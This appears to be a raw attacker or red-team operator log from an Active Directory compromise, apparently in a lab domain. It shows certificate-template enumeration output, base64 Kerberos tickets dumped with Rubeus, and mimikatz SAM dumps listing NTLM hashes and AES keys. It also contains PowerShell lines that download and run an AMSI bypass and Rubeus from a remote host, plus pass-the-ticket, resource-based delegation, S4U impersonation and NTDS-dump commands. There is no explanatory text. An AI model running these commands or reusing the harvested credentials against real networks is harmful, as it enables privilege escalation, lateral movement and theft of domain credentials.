sliver (PERFECT_WHOLESALE) > sa-adcs-enum
[*] Successfully executed sa-adcs-enum (coff-loader)
[*] Got output:
[*] Found 1 CAs in the domain
[*] Listing info for CN=Cyber-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=cyber,DC=local
Enterprise CA Name : Cyber-CA
DNS Hostname : cydc.cyber.local
Flags : SUPPORTS_NT_AUTHENTICATION CA_SERVERTYPE_ADVANCED
Expiration : 1 years
CA Cert :
Subject Name : DC=local, DC=cyber, CN=Cyber-CA
Thumbprint : 8f490e01bd7c21c2eecd0b7411b8770e6f637a0d
Serial Number : caa9e200767d06468fb5010fcd00c421
Start Date : 12/31/2019 06:41:08
End Date : 12/31/2049 06:51:08
Chain : DC=local, DC=cyber, CN=Cyber-CA
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00000100
Flags : 00000001
Extended right : {0E10C968-78FB-11D2-90D4-00C04F79DC55}
Enrollment Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F00FF
Flags : 00000501
Read Rights
Principal : CYBER\CYDC$
Access mask : 000F00FF
Flags : 00000501
Read Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Read Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
Extended right : {05000000-0015-0000-29DD-E977800F3621}
Read Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
Extended right : {05000000-0015-0000-29DD-E977800F3621}
Read Rights
[*] Found 8 templates on the ca
Template Name : CyDCAuth
Friendly Name : CyDCAuth
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.91698091.91698983
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_ALT_REQUIRE_DNS
Enrollment Flags : AUTO_ENROLLMENT
Signatures Required : 0
Extended Key Usage : Smart Card Logon, Server Authentication, Client Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : core\Domain Controllers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Controllers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Controllers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : core\Domain Controllers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Controllers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : CySmartCard
Friendly Name : CySmartCard
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.62333380.11923608
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_DIRECTORY_PATH SUBJECT_ALT_REQUIRE_UPN
Enrollment Flags : AUTO_ENROLLMENT USER_INTERACTION_REQUIRED
Signatures Required : 0
Extended Key Usage : Client Authentication, Smart Card Logon
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : CyberSigning
Friendly Name : CyberSigning
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.3983994.3574272
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_DIRECTORY_PATH SUBJECT_ALT_REQUIRE_UPN
Enrollment Flags : AUTO_ENROLLMENT
Signatures Required : 0
Extended Key Usage : Code Signing
Permissions :
Owner : CYBER\Administrator
S-1-5-21-2011815209-557191040-1566801441-500
Access Rights :
Principal : CYBER\DevOps
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Admins
Access mask : 00000130
Flags : 00000001
Enrollment Rights
WriteProperty Rights
Principal : CYBER\DevOps
Access mask : 00020014
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F00FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Administrator
Access mask : 000F00FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Template Name : UserCert
Friendly Name : UserCert
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.38
Validity Period : 1 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_COMMON_NAME SUBJECT_ALT_REQUIRE_UPN
Enrollment Flags : PUBLISH_TO_DS AUTO_ENROLLMENT
Signatures Required : 0
Extended Key Usage : Client Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : RDP
Friendly Name : RDP
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.37
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_COMMON_NAME SUBJECT_ALT_REQUIRE_DOMAIN_DNS
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : 1.3.6.1.4.1.311.54.1.2
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : Winrm
Friendly Name : Winrm
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.36
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : SUBJECT_REQUIRE_COMMON_NAME SUBJECT_ALT_REQUIRE_DOMAIN_DNS
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : Server Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : SSL
Friendly Name : SSL
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.35
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : ENROLLEE_SUPPLIES_SUBJECT ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : Server Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Template Name : Wildcard
Friendly Name : Wildcard
Template OID : 1.3.6.1.4.1.311.21.8.15649460.510131.12732088.9801446.3498531.105.1.34
Validity Period : 2 years
Renewal Period : 6 weeks
Name Flags : ENROLLEE_SUPPLIES_SUBJECT ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME
Enrollment Flags : PUBLISH_TO_DS
Signatures Required : 0
Extended Key Usage : Server Authentication
Permissions :
Owner : CYBER\Enterprise Admins
S-1-5-21-2011815209-557191040-1566801441-519
Access Rights :
Principal : CYBER\Domain Computers
Access mask : 00000100
Flags : 00000001
Enrollment Rights
Principal : CYBER\Domain Computers
Access mask : 00020094
Flags : 00000501
Principal : CYBER\Domain Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : NT AUTHORITY\Authenticated Users
Access mask : 00020094
Flags : 00000101
Principal : NT AUTHORITY\SYSTEM
Access mask : 000F01FF
Flags : 00000101
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Enterprise Admins
Access mask : 000F01FF
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
Principal : CYBER\Domain Admins
Access mask : 000F01BD
Flags : 00000501
WriteOwner Rights
WriteDacl Rights
WriteProperty Rights
adcs_enum SUCCESS.
rubeus dump /service:krbtgt /luid:0x36e5d /nowrap
doIFyDCCBcSgAwIBBaEDAgEWooIEwzCCBL9hggS7MIIEt6ADAgEFoRIbEENPUkUuQ1lCRVIuTE9DQUyiIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC0NZQkVSLkxPQ0FMo4IEeDCCBHSgAwIBEqEDAgENooIEZgSCBGLkDkv8YrULdWZtDJokvFFanOoi7dBsAG9Y6tqcHu8BphwvOHu8h+8Uemvb5pz30kN8SYp0YK3MbbY8PzuNa9z0o5rhoVlcQANg9wX/eIASFu1InpqBxXnIqToGjczscg8mIef6fQ09X8tujOvKJwjMyYtOVBJPlaw6UcBPVx1VbV9T2Sij3sBs8aJTChhgcCW0JlmnV8HGbPEY44KMOhKBmhy/zc2odAMUs2/ujASJRbcoE+RnahbQk9VI11Ay8WlemOy8eiQIoSKplYs8HyMESD0FpZz4Y1pOshSEaQKNtkUHKEPc4ZCaim8QEIXy4+HyyH6QLgSGcSYj5m0wuubcYAHlgc9oPJ28iF/k/rFh1JuoHNvOJ+q2D/hkgGGhUbil45kMO8JFvXckrZGUXH2wiVxIR3Fr/AispScS/i/Z5tnS4c/Y0cPD/+ezLcbs18gBwf13CBUa8/XYAj3qzzVqbKydTrpFam+Chm4WcUxuKMdQJ4NEy6eb3ZBvXFzQWhhy45AYHhZQfwHja7EZRCYnFvVvKnI+vrKTzeQB1wH6j8lhQM4Rtbo+seICb/RA/5/R1pxW1ebQpeyVT3JcOx2wNYToamvOBj4/XdfFwUGs8+9Yh0+RCa44c0umBAoeIvoLIyIzeSavHiD/1P35jPcqQVnKXRJiyL2g+cBsnjiAl82Sfar5l1Qe5PQgM3n551bdtuZus9By35LLwC5EMdO5gWK3NEadCvsBilAbaxeRN8IPr6RIETID45YjTFijLDJg8bvbYwZthES55RCofbyktAMcBP8frp/eGOIv1EmXp6m0r1/0tMlR9HLgd9bU2Nx1IK/0KKYYuArc4twXmrckjl7uPsVudavZ2qX+14LVCSN6NrqJDwUfoxQ85S0xxqs3SJ5GD9AItNQMAF9Co3B64tm9D18+OpWSxAl9d1tQ7ZqVGLsgDTopaKoqlDg9PKseBV7gltcOvIvpHembJyXAK6Okgrkvm+Kk7gn4fsqxZBEJNDjLSj4E39RUNslzco03upJ2PEVinXYoo/td2OwOa9lNm8mrnEymCbkTgKpFOWes1FClBnrb1AkCZse7v5wyVl79MXg7WaTGz6/TLiaQFW3ptBfOjjcFC9NR9oF6uc+cHnkIq2IKg08pziavk8LwmwBqWW9pgbydX9F5E/QoKVcF4GOXvsR3ZUj3cqrbOH7K4+xLUXvuaUt2q9yAkh7uU0WlScTbvjiJZquFAPHxvygVgutOu6EZmkSttTnLhppdmSBQcCanH782VWYfC07BkshHCV2Y/l9hwGPkqANYkYOZw+D7x0P8Hx4bCTCumdQwbyLE8LyCbTm+jIlnUxbk4sXwMgh9LeEHlZgNxtgunVSrWF9sq//NjJ/pDPUD/2hjH4dBScforbdVNH9rjANlIqVZ4kLnJw25cjtZoG0nc9Ru2KjEIG2LCrP5iXGwyJGuFXyygPE3HpuR5wKpC0uYUWyUH1fjQNpe2Y+c3moA4L6jgfAwge2gAwIBAKKB5QSB4n2B3zCB3KCB2TCB1jCB06ArMCmgAwIBEqEiBCBPmHV5bhnpnKnQzk5iy4BZvVXUcs54omo773oe8Q3tdKESGxBDT1JFLkNZQkVSLkxPQ0FMohgwFqADAgEBoQ8wDRsLSWxlbmUuUmFzY2ijBwMFAEClAAClERgPMjAyNDAzMDExNDU5MDNaphEYDzIwMjQwMzAyMDAzMDQ2WqcRGA8yMDI0MDMwODE0MzA0NlqoEhsQQ09SRS5DWUJFUi5MT0NBTKkgMB6gAwIBAqEXMBUbBmtyYnRndBsLQ1lCRVIuTE9DQUw=
[IO.File]::WriteAllBytes("C:\Users\jay\Desktop\ilene.kirbi", [Convert]::FromBase64String("doIFaDCCBWSgAwIBBaEDAgEWooIEXjCCBFphggRWMIIEUqADAgEFoRIbEENPUkUuQ1lCRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUyjggQOMIIECqADAgESoQMCAQWiggP8BIID+Fa2zsDy5GJGa8tTL1VEQC7fR34a8dpQzFy7nQA8SKT2SNS8AHGSe10u+/kZE943WPtTxFEeJe3K4AMfF2uTNH6cNSQYT18IlDOKt7WMJnjfRJBhYQHgkoZIaK6VWq+3+Pc+5JMRjqnqvA+wCAAAQyr4ue8L3+Ko4fCZHLO5ZtwtnIXA/TgK5aNH8ja2ccwypXDz4gKkJrwbvqdqElSfrFCpRV0PlVKc3KwBaA5ZK5dEpG56B50EVqAYRFF2DDqT5qdaT9nY6U7xVd6QmhirqRydFAdIyvK2iGBUoXbw3jRst1ZS253fFJI8NcdinrKrQnovzcLOPfHsiYGDU9FTduBm/CtWH8zF6LhyTpx9ZDYvrni4KJybMQLL53S93J6nqayA7foQJHVrFgaZG5Oo4zYDOvgFTagLWddRK8UGpNPREo/LmoHHrAC7WROL3cSf2m8N2bJ4TPVgnUw4iVE1fQQyl4kgP5bOnKbm/ScSuWBal6+bTrzsm7qZ8dtQpkcnV3OsljXVw8rSf9d+Qwnmy9i6XijId4kn6zvwCdbNpd+rVV3MV5bZWu9JMUzPrU4RVKbhIouRbjhbbHN4acKitFXndD6M59vxM0+lA6AWpnrdpd6yRq76RggLD6ZCSsKAhlPDiNnczZC5NKOt3Pro4iJTMrrNsTZuDiGvtEZszD/fCPvuKpeYY1lkdVtPaxd8K/AANzIbjo8RPitg5eljPD7m7emeFfKGshi0/ILXV/GSsUl1eq1Fyd2k4tEC9Ku+dl49YdgriX9w4DgoRRoYmPnOYbsNFp5GWNLWAiHNrWkGZt3s47FufRX4iSh0MyIFa/Ue9VVm6EWvmCZsPFEh/IXYFS56W+Lz5AVvoVH0IIrI1VHaNKTHA6EbuRo+3oEq7UWSGgMtQfR0v3P27/wlfbr2XfOXAMo9uAdGFBAN+XqZE+IkRq9caCFi7rviykCkNo9m6jhX5OhxAKZGfqpE96ANr2kBI3IWZD9uRyAQtt3eZ0zCDcSw1SsbhWgK9z4cybMsfs9eC5oZYGPFRJwqjoCTcBvP0Tf2L7jDQdaiyccAJigWZC+kTxPJfJxWVhNH/0X6M4/Up1GJqWH+y7PE5hkN2iinThIWRG6i8NpQQtJUuMLnQUTYWkjQd8IGfQ1TEpbn/QKL7/mXuX6ZXyzYrzZwe7g5Am+JIpxmE8g24DeqOnWFBNWPyZ5SOQj4L5yv5iCV7YH9e3xcQgA1CwGhCZyG73y5moPF2Gkw9+MEGp99NDBSo+a8n+Oz8l9Lenysd/SrPJJPYY8w1BYcJ4tr4IJ+o1mxJQbeV39BjGD1q/XBXO6RtO85/tVKPELbK3w8TMyhr0b05BZ1o4H1MIHyoAMCAQCigeoEged9geQwgeGggd4wgdswgdigKzApoAMCARKhIgQgxf8ABPueGsIE8KWdv1mKWplRNAvkDKBoQw/7IrD5RxWhEhsQQ09SRS5DWUJFUi5MT0NBTKIYMBagAwIBAaEPMA0bC0lsZW5lLlJhc2NoowcDBQBgoQAApREYDzIwMjQwMzAxMTQzMTQ4WqYRGA8yMDI0MDMwMjAwMzA0NlqnERgPMjAyNDAzMDgxNDMwNDZaqBIbEENPUkUuQ1lCRVIuTE9DQUypJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUw="))
mimikatz(powershell) # lsadump::sam
Domain : COREWKT001
SysKey : 43a4388b76afc21c0178ec5745728f16
Local SID : S-1-5-21-731258190-3870040951-2229981493
SAMKey : 72dcfc9fafeb7ed4ca0771782c816f95
RID : 000001f4 (500)
User : Administrator
Hash NTLM: d0211d03f1fd91d82d9204ee109f6971
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : d10ac135ed5c8a217c0ce87ba8610f68
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT001.CORE.CYBER.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : cc924d3c25f10491b9ea92ccbbc4d48062253bcf2d1d44ba46e04db982cc8e24
aes128_hmac (4096) : 49bac784d925647f121b3178225e34a5
des_cbc_md5 (4096) : ced98c4a31f2eccd
OldCredentials
aes256_hmac (4096) : 30b5f96cfe2ca582f6832a1196f92b4d1cd98f30673b2498e0546ac39076ca99
aes128_hmac (4096) : 940824f8132bf1c4a4314de0a11c565b
des_cbc_md5 (4096) : 1a37ea80c201c8b5
OlderCredentials
aes256_hmac (4096) : ccc05a7a7b986981bc7bbf23bbfded2611bf4fd4a74e08860686b4454e3a6fa8
aes128_hmac (4096) : fa3dec23c1f072aabead858c53b0003c
des_cbc_md5 (4096) : b61a85ad408c4016
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT001.CORE.CYBER.LOCALAdministrator
Credentials
des_cbc_md5 : ced98c4a31f2eccd
OldCredentials
des_cbc_md5 : 1a37ea80c201c8b5
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 954fd25162ffdda445dca6edec93b934
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 419725eb3ebd4890c94151ca44a11b9c
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 82f46980497223874b77b91558cbef7cbad2833e5cdf7e83c9f5979591d3f586
aes128_hmac (4096) : add8b777631fd52f26c2f525f5913fbb
des_cbc_md5 (4096) : 970be90de6e3705e
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 970be90de6e3705e
RID : 000003e9 (1001)
User : lkys37en
Hash NTLM: 9307ee5abf7791f3424d9d5148b20177
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : befff551c3b27a36f028b3d4324c2acd
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT001.CORE.CYBER.LOCALlkys37en
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 969a3ed26fc7c004deeb883b5a68e5862fe88aa47829af131dc4636feea69b83
aes128_hmac (4096) : 9df26e35047302395b4b0197dbff8f35
des_cbc_md5 (4096) : 79fe5bd594193bfd
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT001.CORE.CYBER.LOCALlkys37en
Credentials
des_cbc_md5 : 79fe5bd594193bfd
RID : 000003ea (1002)
User : ippsec
Hash NTLM: 58a478135a93ac3bf058a5ea0e8fdb71
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 81b8c0d7559f98fcec93bff2514c07aa
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT001.CORE.CYBER.LOCALippsec
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 4be9e47ecdac8c8bb62ef31fb4d57a5c884c37dc52b83030fb37a5e258fe3ee4
aes128_hmac (4096) : 6aaf293504a6c928e5978c9ddd8c566a
des_cbc_md5 (4096) : 4f2c5bab15ec6291
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT001.CORE.CYBER.LOCALippsec
Credentials
des_cbc_md5 : 4f2c5bab15ec6291
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/test3.ps1");
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt luid:0x36e5d /nowrap'
Invoke-Rubeus -Command 'triage'
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
./rubeustoccache.py doIFaDCCBWSgAwIBBaEDAgEWooIEXjCCBFphggRWMIIEUqADAgEFoRIbEENPUkUuQ1lCRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUyjggQOMIIECqADAgESoQMCAQWiggP8BIID+Iome7Y27YuYdyIAB3+xPcWKS7usrqZp/cPrwn0d37piI/3aj0/t1ej3FudDkjgpBT2MoT4Q5MsgeMPw0lyGlWL3P7GdbZ65VP4xF5WNa3A0wTRY70zUs8qonuQFJBWX9wyondCTWRp2Cin5ugMOji9UNuQVuTbC7BybmVwC9gFtqXkxVyvwG/FrXks2rAA79ZsxvYpZWJv0mkOv5OeRO2GsoSsm1W//VKKZlxIm/nZ2k7aINilzZuE+6A/5ikWhj4PV3OV6tkPk3H0bLZtcgltyIYbsGvrldNv13DA3SAcJA8AMNJVztLmjCyqEErVsUlh6w+gbk70H0JpbgIrRXFRUBhVBXlXmSR3h5rRprPKHh2tpoptvmoXcqBR1mqwup1KG5DE02G46SSy51zOzA8JFvAFORx6UxsNWwXoK1+eLFtaYVr3gTwTlhzWy1TcOlA4SN4HA1yVYg9noFATvI7DND/3hd8bdCu/Ybk8koqS0p7tRkGgFAa648fvQN7MeEV6fvdAZqllFpAsuKMSyUdXBCtGORLO6WvsicIeLCS/TeeX7RbziFBed+OqTsbnH0i2fZT7khUwAm5p4+GlE0WqgTGJqtSgP9UBZ0QUdprzUwRVtHaI56XlHOVrvTJgolhff8yO2JAr4CqXfP14KEM9KAPjbGU2Vx7UAj32XMSZWvFX/rlOpDOL4wyL21kyP3sYSPuQN+TgLYvq///Rzgx7UITqOKuQkWOeU116DOvASG9YcJvYAK2EmFNuE86JtrBpse+DUOhRlGPsuSeb4RRVDpOvdWOxCcixN21hQsxxPPJGWLFfAU6JZruCMrWOvYkgRxoMTZoUIzoZccwIQ9K3FCkThNr/mbEVENeA247hpHVj4oxNRGXq13NURwg1D6+iyign3DTsByJ+qaML8gmvKRFxa0gIF3Nc5KwRGu5rRFshrfzt42uTSsdTxw4xJvhvNeJnZ47FS4AWQzcx4ZfLZ4L/Gip4yeKJQ+3BKbQbTlA021iecNmZKCaVBAWnuXiMn0PJgjeJeGUgOm+EvAM4gxlALVcKxVLkiVDS0k8AnKakcHU0GEHJWA9QnjdHBZOhsL9vji/ubT7/YS9Rcxbbpbx2p8EHM/R8/lAqFCp1QPgfE+LMkMfglMIaD2O5cDozprTM7ZNBrS7uRvwsknJvqVTmlK/dJ1XELuohQJlQJ+UsdbialpLtypXSznzI2ZYiGUbRNMvH67VymIYA0lGfeU/vQmN+OIJllD8xCmkve4UFdCRIJjULkggcF9feleCWw7zXfxSBbmiN15F9d3qWlNiA3fTRRLTcidxi4FjRWq2S06jZLHX8mwkS6B1kdiHmv9zPpHQoHo4H1MIHyoAMCAQCigeoEged9geQwgeGggd4wgdswgdigKzApoAMCARKhIgQgq0vwyuhO+uyfLeXrztS79VxwWkGMbHuumIgC4Z5+zdOhEhsQQ09SRS5DWUJFUi5MT0NBTKIYMBagAwIBAaEPMA0bC0lsZW5lLlJhc2NoowcDBQBgoQAApREYDzIwMjQwMzAyMDEwMDAxWqYRGA8yMDI0MDMwMjEwMzQxN1qnERgPMjAyNDAzMDkwMDM0MTdaqBIbEENPUkUuQ1lCRVIuTE9DQUypJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUw= ilene1.kribi ilene1.ccache
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=ilene1.ccache
cme smb 10.9.15.10 -u 'ilene.rasch' --use-kcache
rbcd.py -delegate-from COREWKT001$ -delegate-to COREWKT002$ -action 'write' 'core.cyber.local/ilene.rasch' -k -no-pass
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
cme smb 10.9.20.10 -u norma.branham --use-kcache --ntds
Invoke-Rubeus -Command 's4u /impersonateuser:Administrator /msdsspn:time/m3webaw.m3c.local /user:svc_sql /altservice:http /ticket:doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA629WjDAox0jgbqJ/DD9jzNLOb02q17JAGguWLQxzwRn9VLWtrnXlMl1cxhca9EiCtkR/aLEJuhfJjDy89tLv5r7tdSo5RekT6QS7PByg4FKh+FoW4qzF2SZEqG8CfYppXxrPMs9srD8oonXcUZ/nZPYkBBW9ldR7JDiL3VAkBZWrDE4whdlb9RLeIMLG0frpkgMjH6LKSThqC3wpXvyPsjSO3cZFn5qxxZc6trfi0Kh/i8rMuP0WPZQALxCPcd/K+254IE2vfyAMFu7DGzvWrlI88pFqEdLcHdBIus2PM1EQqWNi24x3vlqDEs2ga/Q2h+QmCweG4sQEjQLkDRArvuhl+/xa5CYJ1qjjKkJn4T/4JDtA89//XzuZvNB7LzwCuo3DdomfkyD1SdixYeSz7RyZOrtupZMeN0PWXZ7PWd2CLCkPYlW1oRXntkQQu7eXCTqD4nNoGwakYx4Rvj+E956AHbEsyxqudoYEYQDP16KWs2BrG8anRxHodYXeiuWmed5054y6EKgPnTv6Llu1GgWe9lVOHYD2KNqWgBkT5UIrqWd84xrb+ZUovVGrUL9tEaVUHp1bGIdEtlGQ9Xn8pEYOEfEnb1nTMBxlISTvqwZcI1XPlwXr/py9i2yEdB7rtAV1N/YYnD/hC4I650w0aT8kwtcNOOFANNxwsXFLVlO3Fjk9hGIuL33cTGytLRJIC3pw3WznCmx1PkMW+v3/V+I4EqqbCfu1jd0UTRtze5ApNZj9gJlDoetoUgAuLwS0joQVuZA